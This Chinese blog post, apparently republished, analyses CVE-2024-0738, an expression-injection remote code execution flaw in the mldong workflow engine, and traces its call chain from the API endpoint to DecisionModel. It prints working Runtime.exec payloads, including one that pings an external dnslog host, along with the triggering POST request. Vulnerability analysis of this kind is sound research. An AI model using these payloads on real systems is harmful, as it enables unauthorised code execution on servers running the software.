CVE-2024-0738 Mldong ExpressionEngine RCE漏洞分析

漏洞描述

A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

个人开源mldong 1.0中发现一个严重漏洞。此问题影响文件 com/mldong/modules/wf/engine/model/DecisionModel.java 的 ExpressionEngine 函数。这种操纵会导致代码注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。

相关参考

NVD - CVE-2024-0738icon-default.png?t=N7T8https://nvd.nist.gov/vuln/detail/CVE-2024-0738

https://github.com/biantaibao/mldong_RCE/blob/main/RCE.mdicon-default.png?t=N7T8https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md

mldong开源项目地址

mldong: SpringBoot+Vue3快速开发平台、自研工作流引擎icon-default.png?t=N7T8https://gitee.com/mldong/mldong

漏洞发现点

在mldong项目中DecisionModel类里有一个exec方法,它似乎可以执行表达式

 这个ExpressionUtil.eval引起了我们的兴趣。

本地建立文件,测试这行代码是否存在表达式注入。

 (测试环境最好在本项目中,保持环境包的一致性)


import cn.hutool.extra.expression.ExpressionUtil;import java.util.HashMap;
import java.util.Map;public class Test {public static void main(String[] args) {String expression = "T(java.lang.Runtime).getRuntime().exec('calc')";Map<String, Object> context = new HashMap<>();context.put("a", 1);context.put("b", 2);context.put("c", 3);Object result = ExpressionUtil.eval(expression, context);System.out.println(result);}
}

技巧:
        1.通过这个包ExpressionUtil在网上找寻使用示例代码或使用手册,再凭经验修改相关参数为表达式payload以造成命令执行。
        2.表达式的payload可以网上输入关键字收集,比如搜索cn.hutool.extra.expression.ExpressionUtil 表达式注入 历史漏洞什么。
        3.有了足够多的payload就可以做模糊测试了

本机计算机弹出,项目的确存在RCE漏洞

找寻调用接口

发现了漏洞点,如何寻找调用的接口,这里提供了几个技巧(还有什么技巧,请大佬补充)
1,右键找相关函数的usages,逐个分析
2,打上断点,前端点击功能看看那个接口会卡住

我这里右键找exec的usages

public abstract class NodeModel extends BaseModel implements Action {private String layout;// 布局属性(x,y,w,h)// 输入边集合private List<TransitionModel> inputs = new ArrayList<TransitionModel>();// 输出边集合private List<TransitionModel> outputs = new ArrayList<TransitionModel>();private String preInterceptors; // 节点前置拦截器private String postInterceptors; // 节点后置拦截器/*** 由子类自定义执行方法* @param execution*/abstract void exec(Execution execution);@Overridepublic void execute(Execution execution) {// 0.设置当前节点模型execution.setNodeModel(this);// 1. 调用前置拦截器execPreInterceptors(execution);// 2. 调用子类的exec方法exec(execution);// 3. 调用后置拦截器execPostInterceptors(execution);}

再次右键找execute的usages...

后面我就遇到了很多困难,因为java的继承类 接口实现类需要挨个分析 也不排除重名现象。如果想分析到接口层,可得下一番功夫。

这里我们先跳过这一步,来到前端的功能页面寻找相关的线索。....

待漏洞复现完毕后 我们再分析接口的调用!

.....

漏洞复现

进入后台管理在流程设计页面中新增流程设计

右键 设置流程属性  

添加这样的流程

点击条件判断的框

准备payload 打dns

T(java.lang.Runtime).getRuntime().exec('ping xxxx.dnslog.cn')  

保存 部署 准备执行  

 来到流程定义开始执行

 顺便添几个 点击确定

查看dnslog结果

ok rce成功复现

接口调用分析

看看它调用了什么接口

 post数据参考

POST /api/wf/processDefine/startAndExecute HTTP/1.1
Host: 
Connection: close

{"processDefineId":"1749714638596308993","f_startTime":["2024-01-23 ",null],"f_endTime":["2024-01-25 ",null],"f_reasonType":2,"f_day":2.5,"f_title":"test"}

来到后端

@PostMapping("/wf/processDefine/startAndExecute")
@ApiOperation(value = "启动流程实例")
@SaCheckPermission(value = {"wf:processDefine:startAndExecute","wf:processDesign:listByType"}, mode = SaMode.OR)
public CommonResult<?> startAndExecute(@RequestBody Dict args) {Long processDefineId = args.getLong(FlowConst.PROCESS_DEFINE_ID_KEY);args.remove(FlowConst.PROCESS_DEFINE_ID_KEY);processInstanceService.startAndExecute(processDefineId,args);return CommonResult.ok();
}

 跟进startAndExecute

public class ProcessInstanceServiceImpl extends ServiceImpl<ProcessInstanceMapper, ProcessInstance> implements ProcessInstanceService {
...private final ProcessTaskMapper processTaskMapper;private final ProcessCcInstanceMapper processCcInstanceMapper;@Override@Transactional(rollbackFor = Exception.class)public void startAndExecute(Long processDefineId, Dict args) {String operator = LoginUserHolder.getUserId().toString();FlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);ProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId,operator,args);List<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(),new String[]{});// 取任务自动执行processTaskList.forEach(processTask -> {args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);});}
...
}

在方法中,首先获取当前登录用户的操作员 ID:

javaCopy CodeString operator = LoginUserHolder.getUserId().toString();

然后,获取 FlowEngine 实例:

javaCopy CodeFlowEngine flowEngine = SpringUtil.getBean(FlowEngine.class);

接下来,使用 flowEngine 实例的 startProcessInstanceById 方法启动一个流程实例,并传入 processDefineIdoperatorargs 参数:

javaCopy CodeProcessInstance processInstance = flowEngine.startProcessInstanceById(processDefineId, operator, args);

然后,使用 flowEngine 实例的 processTaskService() 方法获取正在进行中的任务列表:

javaCopy CodeList<ProcessTask> processTaskList = flowEngine.processTaskService().getDoingTaskList(processInstance.getId(), new String[]{});

接下来,对任务列表进行遍历,并自动执行每个任务:

javaCopy CodeprocessTaskList.forEach(processTask -> {args.put(FlowConst.SUBMIT_TYPE, ProcessSubmitTypeEnum.APPLY.getCode());flowEngine.executeProcessTask(processTask.getId(), FlowConst.AUTO_ID, args);
});

跟进 flowEngine.executeProcessTask(processTask.getId(),FlowConst.AUTO_ID,args);

public class FlowEngineImpl implements FlowEngine {protected Configuration configuration;private ProcessDefineService processDefineService;private ProcessInstanceService processInstanceService;private ProcessTaskService processTaskService;
...@Override@Transactional(rollbackFor = Exception.class)public List<ProcessTask> executeProcessTask(Long processTaskId, String operator, Dict args) {Execution execution = execute(processTaskId,operator,args);if(execution == null) return Collections.emptyList();ProcessModel processModel = execution.getProcessModel();// 7. 根据流程任务名称获取对应的任务节点模型NodeModel nodeModel = processModel.getNode(execution.getProcessTask().getTaskName());// 8. 调用节点模型执行方法nodeModel.execute(execution);return execution.getProcessTaskList();}
...
}

这段代码首先调用 execute 方法来执行指定的流程任务,并将执行结果保存在一个 Execution 对象中。如果 execute 方法返回的 Execution 对象为 null,则直接返回一个空列表。

接着,代码从 Execution 对象中获取了当前任务所属的流程模型(ProcessModel 对象),并根据当前任务名称获取了对应的节点模型(NodeModel 对象)。最后,代码调用了该节点模型的 execute 方法来完成任务的执行。

需要注意的是,该方法使用了 @Transactional 注解来添加事务支持,保证代码在执行过程中出现异常时可以进行回滚。同时,该方法还使用了 Dict 类型的参数来传递一些额外的参数信息,以便在执行过程中进行相关操作。

 跟进Execution execution = execute(processTaskId,operator,args); 看看对参数的处理

public class FlowEngineImpl implements FlowEngine {protected Configuration configuration;private ProcessDefineService processDefineService;private ProcessInstanceService processInstanceService;private ProcessTaskService processTaskService;
.../*** 生成执行对象* @param processTaskId* @param operator* @param args* @return*/private Execution execute(Long processTaskId, String operator, Dict args) {// 1.1 根据id查询正在进行中的流程任务ProcessTask processTask = processTaskService.getById(processTaskId);if(processTask == null || !ProcessTaskStateEnum.DOING.getCode().equals(processTask.getTaskState())) {throw new JFlowException(WfErrEnum.NOT_FOUND_DOING_PROCESS_TASK);}// 1.2 判断是否可以执行任务if(!processTaskService.isAllowed(processTask,operator)) {// 当前参与者不能执行该流程任务throw new JFlowException(WfErrEnum.NOT_ALLOWED_EXECUTE);}// 2. 根据流程任务查询流程实例ProcessInstance processInstance = processInstanceService.getById(processTask.getProcessInstanceId());// 3. 根据流程实例查询流程定义ProcessDefine processDefine = processDefineService.getById(processInstance.getProcessDefineId());// 4. 将流程定义文件转成流程模型ProcessModel processModel = ModelParser.parse(processDefine.getContent());// 5. 将流程任务状态修改为已完成processTaskService.finishProcessTask(processTaskId,operator,args);processTask.setTaskState(ProcessTaskStateEnum.FINISHED.getCode());// 6. 根据流程定义、实例、任务构建执行参数对象Execution execution = new Execution();execution.setProcessModel(processModel);execution.setProcessInstance(processInstance);execution.setProcessInstanceId(processInstance.getId());execution.setProcessTask(processTask);execution.setProcessTaskId(processTaskId);execution.setOperator(operator);execution.setEngine(this);Dict processInstanceVariable = JSONUtil.toBean(processInstance.getVariable(),Dict.class);Dict newArgs = Dict.create();newArgs.putAll(processInstanceVariable);newArgs.putAll(args);execution.setArgs(newArgs);// 如果提交参数中存在f_前辍参数,则更新到流程实例变量中Dict addArgs = Dict.create();args.forEach((key,value)->{if(key.startsWith(FlowConst.FORM_DATA_PREFIX)) {addArgs.put(key,value);}});if(ObjectUtil.isNotEmpty(addArgs)) {processInstanceService.addVariable(processInstance.getId(), addArgs);}return execution;}
...
}

 得到execution对象,返回进入nodeModel.execute(execution);

public abstract class NodeModel extends BaseModel implements Action {private String layout;// 布局属性(x,y,w,h)// 输入边集合private List<TransitionModel> inputs = new ArrayList<TransitionModel>();// 输出边集合private List<TransitionModel> outputs = new ArrayList<TransitionModel>();private String preInterceptors; // 节点前置拦截器private String postInterceptors; // 节点后置拦截器
/*** 由子类自定义执行方法* @param execution*/
abstract void exec(Execution execution);
@Override
public void execute(Execution execution) {// 0.设置当前节点模型execution.setNodeModel(this);// 1. 调用前置拦截器execPreInterceptors(execution);// 2. 调用子类的exec方法exec(execution);// 3. 调用后置拦截器execPostInterceptors(execution);
}

进入exec方法,这就来到了触发漏洞点的地方

public class DecisionModel extends NodeModel {private String expr; // 决策表达式private String handleClass; // 决策处理类@Overridepublic void exec(Execution execution) {// 执行决策节点自定义执行逻辑boolean isFound = false;String nextNodeName = null;if(StrUtil.isNotEmpty(expr)) {Object obj = ExpressionUtil.eval(expr, execution.getArgs());//漏洞触发点nextNodeName = Convert.toStr(obj,"");} else if(StrUtil.isNotEmpty(handleClass)) {DecisionHandler decisionHandler = ReflectUtil.newInstance(handleClass);nextNodeName = decisionHandler.decide(execution);}for(TransitionModel transitionModel: getOutputs()){if (StrUtil.isNotEmpty(transitionModel.getExpr()) && Convert.toBool(ExpressionUtil.eval(transitionModel.getExpr(), execution.getArgs()), false)) {// 决策节点输出边存在表达式,则使用输出边的表达式,true则执行isFound = true;transitionModel.setEnabled(true);transitionModel.execute(execution);} else if(transitionModel.getTo().equalsIgnoreCase(nextNodeName)) {// 找到对应的下一个节点isFound = true;transitionModel.setEnabled(true);transitionModel.execute(execution);}}if(!isFound) {// 找不到下一个可执行路线throw new JFlowException(WfErrEnum.NOT_FOUND_NEXT_NODE);}}
}
总结

本次我们分析了CVE-2024-0738漏洞,运用模糊测试的思想挖掘了ExpressionUtil.eval的表达式注入漏洞,之后找到相关调用接口,构造恶意的参数。从而造成表达式的执行。

本次漏洞研究发的包有点复杂,就不附赠poc。有想法的小伙伴可以尝试一下

至于ExpressionUtil.eval底层调用的机制,等下次分章再分析吧...

欢迎大佬评论区留言,

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/642096.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【蓝桥备赛】数组分割——组合数学?

【蓝桥备赛】数组分割——组合数学?

题目链接 数组分割 个人思路 两个数组都需要和为偶数&#xff0c;那么就去思考一个数组如何才能和是偶数呢&#xff1f;&#xff1f; 数组里肯定要么是奇数要么是偶数&#xff0c;偶数无论有多少个&#xff0c;都不会改变一个数组的奇偶性。但是奇数个奇数的和还是奇数&…
阅读更多...
Vue+Element(el-switch的使用)+springboot

Vue+Element(el-switch的使用)+springboot

目录 1、编写模板 2、发送请求 3、后端返数据 1.Controller类 2.interface接口&#xff08;Service层接口&#xff09; 3.Service&#xff08;接口实现&#xff09; 4.interface接口&#xff08;Mapper层接口&#xff09; 5.xml 6.效果 4、el-switch属性 1、编写模板 …
阅读更多...
Linux操作系统常用指令大全(一)

Linux操作系统常用指令大全(一)

一、关机与重启指令 &#xff08;1&#xff09;shutdown - 关机 语法&#xff1a;shutdown shutdown -h now 【立即关机】 shutdown -h 1 【1分钟后关机&#xff0c;shutdown后不填默认一分钟后关机】 shutdown -r now 【立即重启】 &#xff08;3&#xff09;reboot - 重启 …
阅读更多...
数字图像处理(实践篇)二十六 使用cvlib进行人脸检测、性别检测和目标检测

数字图像处理(实践篇)二十六 使用cvlib进行人脸检测、性别检测和目标检测

目录 1 安装cvlib 2 涉及的函数 3 实践 4 其他 cvlib一个简单,高级,易于使用的开源Python计算机视觉库。 1 安装cvlib # 安装依赖pip install opencv-python tensorflow# 安装cvlibpip install cvlib</
阅读更多...
【最新!超详细C++入门】

【最新!超详细C++入门】

01_C语言基础 一、课程目标 1、掌握 C基本语法&#xff1a;变量、常量、注释、标识符命名规范 2、掌握C数据类型 3、掌握C的输入和输出 4、掌握C运算符和表达式 5、掌握条件语句 6、掌握循环语句 二、课程内容 1 C初识 1.1 第一个C程序 编写一个C程序总共分为4个步骤…
阅读更多...
iLO 安装中文固件包

iLO 安装中文固件包

前言 安装中文版本的安装包&#xff0c;需要把对应的ilo安装到固定的版本上&#xff0c;ilo的版本是2.70。必须是这个版本&#xff1b; 如果不是这个版本就需要刷到对应的ilo版本 下载对应的固件包。 到这个界面选择文件&#xff0c;然后点击上载。 以上就是刷系统包的步骤。 …
阅读更多...
MATLAB 和 Octave 之间的区别

MATLAB 和 Octave 之间的区别

MATLAB 和 Octave 之间的区别 MATLAB 和 Octave 有一些区别&#xff0c;但大多数都是相同的。你可以说 Octave 是 MATLAB 的免费版本&#xff0c;语法几乎与 MATLAB 相同。但是 MATLAB 比 Octave 具有更多功能&#xff0c;就像具有 Simulink 一样&#xff0c;后者用于开发和分…
阅读更多...
Unity3D 游戏转场时如何保留节点信息详解

Unity3D 游戏转场时如何保留节点信息详解

前言 Unity3D是一款非常强大的游戏开发引擎&#xff0c;它提供了丰富的功能和工具&#xff0c;使开发者能够轻松创建各种类型的游戏。在游戏开发过程中&#xff0c;转场是一个非常常见的需求&#xff0c;它可以使游戏过程更加流畅和连贯。然而&#xff0c;在转场过程中&#x…
阅读更多...
前端基于XLSX实现数据导出到Excel表格,以及提示“文件已经被损坏,无法打开”的解决方法

前端基于XLSX实现数据导出到Excel表格,以及提示“文件已经被损坏,无法打开”的解决方法

文章目录 一、vue实现导出excel1、前端实现1、安装xlsx依赖2、引入3、方法4、使用4.1、将一个二维数组转成sheet4.2、将一个对象数组转成sheet4.3、合并单元格4.4、一次导出多个sheet 5、支持的文件格式 2、后端实现 二、导出文件损坏1、前端请求导出接口&#xff0c;增加返回类…
阅读更多...
宝塔FTP文件传输服务结合cpolar内网穿透实现远程连接本地服务

宝塔FTP文件传输服务结合cpolar内网穿透实现远程连接本地服务

⛳️ 推荐 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到网站。 文章目录 ⛳️ 推荐1. Linux安装Cpolar2. 创建FTP公网地址3. 宝塔FTP服务设置4. FTP服务远程连接小结 5. 固定FTP公网地址6. 固…
阅读更多...
C++ 20 Module

C++ 20 Module

头文件包含一直是C/C的传统&#xff0c;它使代码声明与实现分离&#xff0c;但它有一个非常大的问题就是会被重复编译&#xff0c;拖累编译速度。 通常一个标准头文件iostream展开后可能达几十万甚至上百万行。笔者使用下面的示例进行测试&#xff0c;新建一个main.cc&#xf…
阅读更多...
在vite.config.js 配置代理

在vite.config.js 配置代理

在 Vite 中&#xff0c;你可以使用 proxy 选项在 vite.config.js 文件中配置代理。这可以让你在开发时将特定的请求代理到其他服务器或本地端口&#xff0c;而不需要修改源代码。下面是一个示例和说明&#xff0c;帮助你了解如何配置代理。 示例和说明 假设你有一些 API 请求…
阅读更多...
processing集训day01

processing集训day01

介绍 Processing是一门开源编程语言&#xff0c;提供了对图片&#xff0c;动画和声音进行编程的环境。学生&#xff0c;艺术家&#xff0c;设计师&#xff0c;建筑师&#xff0c;研究人员和业余爱好者可以使用Processing进行学习&#xff0c;制作原型以及作为生产工具。你可以…
阅读更多...
C++:迭代器失效问题

C++:迭代器失效问题

目录 1.vector迭代器失效问题 1.底层空间改变 ​编辑 2.指定位置元素的删除操作 2.Linux下的迭代器失效检测 1.扩容 2.删除 3.解决方法 1.vector迭代器失效问题 迭代器的主要作用就是让算法能够不用关心底层数据结构&#xff0c;其底层实际就是一个指针&#xff0c;或者是…
阅读更多...
前端使用css去除input框的默认样式

前端使用css去除input框的默认样式

关键点&#xff1a; /* 关键点&#xff0c;让输入框无边框 */outline:none; border:none; 1.效果图 2.html <div class"container"><input type"text" placeholder"请输入用户名"><input type"text" placeholder&q…
阅读更多...
145 删除链表的第N个节点的3种方式

145 删除链表的第N个节点的3种方式

问题描述&#xff1a;给定一个链表&#xff0c;删除链表的倒数第n个节点&#xff0c;并且返回链表的头结点。 栈求解&#xff1a;对于栈而言可以很好地解决链表只能从前往后访问的问题&#xff0c;栈是解决从后往前访问的利器。 public TreeNode deleteLastNNode(ListNode ro…
阅读更多...
在命令提示符,csc不能使用,怎么办?

在命令提示符,csc不能使用,怎么办?

找到一个路径&#xff0c;"C:\Windows\Microsoft.NET\Framework64\v4.0.30319"&#xff0c;将此路径添加到环境变量。 在Windows 11里&#xff0c;Setting--About--Advanced System Settings--Environment Variables&#xff0c;双击Path。 PS C:\Users\a-xiaobodou…
阅读更多...
Java算法 leetcode简单刷题记录5

Java算法 leetcode简单刷题记录5

Java算法 leetcode简单刷题记录5 老人的数目&#xff1a; https://leetcode.cn/problems/number-of-senior-citizens/ substring(a,b) 前闭后开 统计能整除数字的位数&#xff1a; https://leetcode.cn/problems/count-the-digits-that-divide-a-number/ 并不复杂&#xff0c;…
阅读更多...
springboot+mysql校园社团信息管理系统-计算机毕业设计源码62756

springboot+mysql校园社团信息管理系统-计算机毕业设计源码62756

目 录 摘要 第1章 绪论 1.1 研究背景 1.2 研究意义 1.3论文结构与章节安排 第2章 相关技术 ....... 2.1开发技术 2.2 Java简介 2.3 MVVM模式 2.4 B/S结构 2.5 MySQL数据库 2.6 SpringBoot框架介绍 第3章 系统分析 6 3.1 可行性分析 6 3.2 系统流程分析 6 3.3 …
阅读更多...
前端JavaScript篇之JavaScript有哪些数据类型,它们的区别?

前端JavaScript篇之JavaScript有哪些数据类型,它们的区别?

目录 JavaScript有哪些数据类型&#xff0c;它们的区别&#xff1f;数据类型区别 JavaScript有哪些数据类型&#xff0c;它们的区别&#xff1f; 数据类型 JavaScript数据类型有&#xff1a; Undefined、Null、Boolean、Number、String、Array、Object、Symbol、BigInt… St…
阅读更多...
最新文章

Copyright @ 2022~2023